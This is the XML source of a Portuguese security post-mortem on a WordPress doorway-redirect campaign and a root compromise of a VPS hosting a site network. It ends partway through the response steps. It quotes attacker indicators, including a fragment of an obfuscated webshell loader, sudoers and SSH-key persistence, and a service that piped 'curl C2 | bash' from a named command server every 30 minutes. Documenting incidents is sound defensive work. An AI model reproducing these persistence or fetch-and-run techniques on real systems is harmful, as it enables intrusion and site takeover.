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40"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Post-Mortem Consolidado — Incidente de Segurança</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Campanha de Doorway (WordPress) + Comprometimento de ROOT (servidor)</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:br/>
        <w:t xml:space="preserve">VPS Contabo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>94.72.113.139</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> (vmi2566650)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54"/>
        <w:gridCol w:w="9485"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="18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Classificação</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9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b/>
                <w:color w:val="C0392B"/>
              </w:rPr>
              <w:t>CRÍTICO</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve"> — invasão ativa com acesso de root/administrador</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="18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Origem da infecção</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9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~18/08/2025 (1ª modificação de arquivos; migrou junto com os sites para este VPS em ~out/2025)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="18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Escalada e resposta</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9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07/08/2026 (re-plantio) → 08/08/2026 (1ª resposta, camada WordPress) → 14–15/08/2026 (2ª resposta, camada servidor/root)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="18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Plataforma</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9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AlmaLinux 9.5 | CyberPanel | OpenLiteSpeed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="18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Escopo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9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Rede de ~42–116 sites WordPress (noobnews / clopnews / hentips / sbtmoney / 123milhass / curriculogratis / ocurriculocerto …)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="18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 atual</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9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b/>
                <w:color w:val="1E7E34"/>
              </w:rPr>
              <w:t>RESOLVIDO</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve"> — doorway eliminado e verificado; root comprometido erradicado; servidor endurecido e reiniciado; sites 200</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="18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Documento</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9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v3 (consolidado) — 15/08/2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>1. Sumário Executivo (para não técnicos)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Uma rede de sites foi </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>invadida</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> por uma campanha de "doorway" (redirecionamento): visitantes de </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>celular</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> vindos do Google eram jogados para páginas de terceiros (encurtadores "ushort"), com risco de perda de tráfego/receita e de o Google marcar os domínios como perigosos (derrubando SEO/AdSense de toda a rede).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">A invasão aconteceu em </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>dois níveis</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">, e foi entendida em </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>duas etapas</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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Nível 1 — WordPress (visível):</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> o invasor entrou com uma </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>senha de admin válida</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> (a senha única/compartilhada da equipe, vazada), subiu um "tema" falso que era um programa espião (webshell) e injetou o redirecionamento. Detectado e respondido em </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>08/08/2026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Nível 2 — Servidor/ROOT (oculto):</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> no mesmo 08/08, o invasor usou a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>mesma senha compartilhada</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> para logar como </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> (via SSH) e instalou um "motor de reinfecção" que, a cada 30 minutos, baixava e reexecutava o vírus </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>direto no disco</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> — reescrevendo os arquivos já limpos e driblando as proteções do WordPress. Foi isto que fez o site "reinfectar depois de um tempo". Este nível só pode ser visto e removido com </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>acesso de root</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> — que a equipe não possuía. O acesso foi obtido apenas no dia seguinte, e a erradicação ocorreu em </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>14–15/08</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Ao final: o motor de reinfecção foi destruído, todas as camadas do vírus removidas, as causas-raiz fechadas, o servidor atualizado e reiniciado, e </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>todas as credenciais</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> (inclusive as de banco de dados) rotacionadas. A infecção não retornou.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>2. Contexto Operacional e de Acesso (por que foram duas etapas)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Este servidor e sua configuração estavam sob </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>gestão anterior</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>. Pontos de fato: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 infecção de doorway </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>já veio junto</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> com os sites quando foram migrados para este VPS (arquivos maliciosos datam de 2025, antes desta plataforma).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 configuração do servidor, como recebida, tinha as portas de entrada abertas que permitiram a escalada a root: login de root por </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>senha</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> aberto à internet, banco de dados exposto publicamente, sistema sem atualizações e sem proteção de força-bruta. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Nenhuma dessas condições foi introduzida pela equipe atual</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> — são anteriores ao seu envolvimento.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 equipe tinha acesso ao </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>WordPress</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> dos sites, mas </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>não</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> tinha acesso de </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>root/SO</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> ao servidor. Por isso a 1ª resposta (08/08) atuou corretamente na única camada alcançável — o WordPress — e não tinha como enxergar o motor de reinfecção no nível do sistema operacional.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Quando o problema estourou, a equipe atual foi colocada para resolver um servidor que </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>nunca havia operado</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">. O acesso de root precisou ser recuperado durante a própria resposta e só foi obtido no </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>dia seguinte</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">. Durante a recuperação de acesso, o IP da equipe chegou a ser </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>bloqueado</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> pela proteção do próprio servidor — refletindo um ambiente ainda hostil e sob controle ativo do intruso (o motor de reinfecção seguia vivo, reexecutando a cada 30 min).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Foi necessário aprender a operar o ambiente </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Contabo/CyberPanel</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> em paralelo à contenção, sob pressão de incidente. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
        </w:rPr>
        <w:t>Resumo honesto:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> a origem foi uma configuração herdada e uma infecção que veio de fora; a 1ª resposta resolveu o que era visível/alcançável; a persistência real estava no nível de servidor, só acessível depois — e foi eliminada assim que o acesso permitiu.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>3. Como o Ataque Funcionava (cadeia confirmada em logs e arquivos)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Vetor A — WordPress (camada visível)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Login com credencial válida</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> (não foi força bruta): </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>POST /wp-login.php → 302</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> (sucesso) do IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>216.126.229.185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Upload de tema malicioso:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>POST /wp-admin/update.php?action=upload-theme → 200</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">. Temas falsos que são webshell: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>upmibpk</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>xdpelfa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Execução do webshell</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> (auto-decodificador, família AnonymousFox): </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>GET /wp-content/themes/xdpelfa/archive.php</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>eval(gzuncompress(str_replace(… file_get_contents(__FILE__) …)))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Injeção do redirect</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> (encurtador em base64 por parâmetro): </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>?domain=dXNob3J0Lm9ic2VydmVy… → ushort.observer/JDseQHdTw0r4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Persistência no WordPress:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> admins escondidos, webshells em várias pastas, option </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>home</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> sequestrada, injeção no </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>post_content</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> do banco. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Vetor B — Servidor/ROOT (camada oculta, mesma janela)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Login de ROOT por senha</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> (a mesma senha compartilhada), via SSH: do IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>91.92.42.7</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">, em 08/08 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>~20:37 (horário de Brasília)</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
        </w:rPr>
        <w:t>Nota de fuso: o servidor registra em horário de Chicago (CDT, UTC−5), 2h atrás de Brasília — portanto 18:37 no log = 20:37 em Brasília.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Persistência de sistema:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> chave SSH própria (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>ElPatrono1337</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">) em 120 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>authorized_keys</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> (imutáveis); sudoers </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>NOPASSWD:ALL</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> em 120 contas; minerador de criptomoeda (Kinsing) com watchdog.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Motor de reinfecção:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> serviço </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>myservices.service</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>/usr/bin/ssshd</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">, que a cada 30 min fazia </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>curl C2 | bash</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> (C2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>195.24.237.240</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">). Reescrevia os arquivos do doorway direto no disco, como root, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>driblando o DISALLOW_FILE_MODS</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> (que só bloqueia o painel WordPress). </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Cloaking:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> o redirect só disparava para quem chegava de </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>celular</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> e vindo de busca do Google — por isso, no desktop e já logada, a equipe muitas vezes "não via" o problema.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>4. Por Que Reinfectava "Depois de um Tempo" (a peça que faltava)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">A 1ª resposta (08/08) fez o correto na camada WordPress: rotacionou as senhas de admin, aplicou </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>DISALLOW_FILE_MODS</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> (fecha o upload-theme pelo painel), limpou banco, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>home</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> e arquivos. Isso fecha o </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Vetor A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Mas o </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Vetor B (root)</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> continuava aberto: a senha de root do servidor era a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>mesma senha compartilhada</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> e não estava sob controle da equipe (sem acesso de root). Com root, o motor de reinfecção reescrevia o doorway a cada 30 min, no disco, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>ignorando todas as proteções de WordPress</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">. Resultado: a limpeza era desfeita sozinha pouco depois. Uma vez destruído o motor e fechado o login de root por senha, a reinfecção </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>parou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5. Causa-Raiz</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Causa-raiz primária:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>senha única/compartilhada vazada</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> — usada tanto para o admin do WordPress (Vetor A) quanto para o root do servidor via SSH (Vetor B). Um único vazamento deu acesso a toda a rede </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> ao servidor.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Causas-raiz contribuintes</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> (condições herdadas, anteriores à equipe atual):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Login de root por senha aberto à internet (permitiu o Vetor B).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Banco de dados MariaDB exposto em </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>0.0.0.0:3306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Sistema sem atualizações de segurança (186 pendentes) e sem fail2ban.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Infecção de doorway migrada junto com os sites (origem em 2025).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Repositório de pacotes apontando para domínio expirado (supply-chain). </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>6. Resposta — O Que Foi Feito (as duas etapas)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Etapa 1 — Camada WordPress (08/08/2026)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IPs do invasor bloqueados: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>216.126.229.185</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>172.86.66.0/24</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>172.86.92.0/24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Admins fantasmas (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>jwpadmin</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>thradmin</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> — data falsa 1970-10-10) removidos dos 42 sites; todas as sessões encerradas.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Limpeza do </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>post_content</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> no banco (regex ancorado no domínio do doorway). Destaque: fr.ocurriculocerto = 687 posts.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Option </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>home</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> restaurada em 36 sites (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>home = siteurl</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> limpo); cache Yoast corrigido (de.123milhass).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Webshells de </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>.well-known</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> e </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>PaxHeaders</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> quarentenados.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Senhas de 27 admins rotacionadas (257 updates); </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>DISALLOW_FILE_MODS</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> na rede.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Verificação:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> 110 sites testados (celular + referer Google) → 0 redirecionando. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
        </w:rPr>
        <w:t>Observação:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> falsos-positivos corretamente preservados (getID3, TCPDF, tema real "consultstreet", CSS "menu-shortcut"). Cache do LiteSpeed mascarava a limpeza (exige </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>lswsctrl stop</w:t>
      </w:r>
      <w:r>
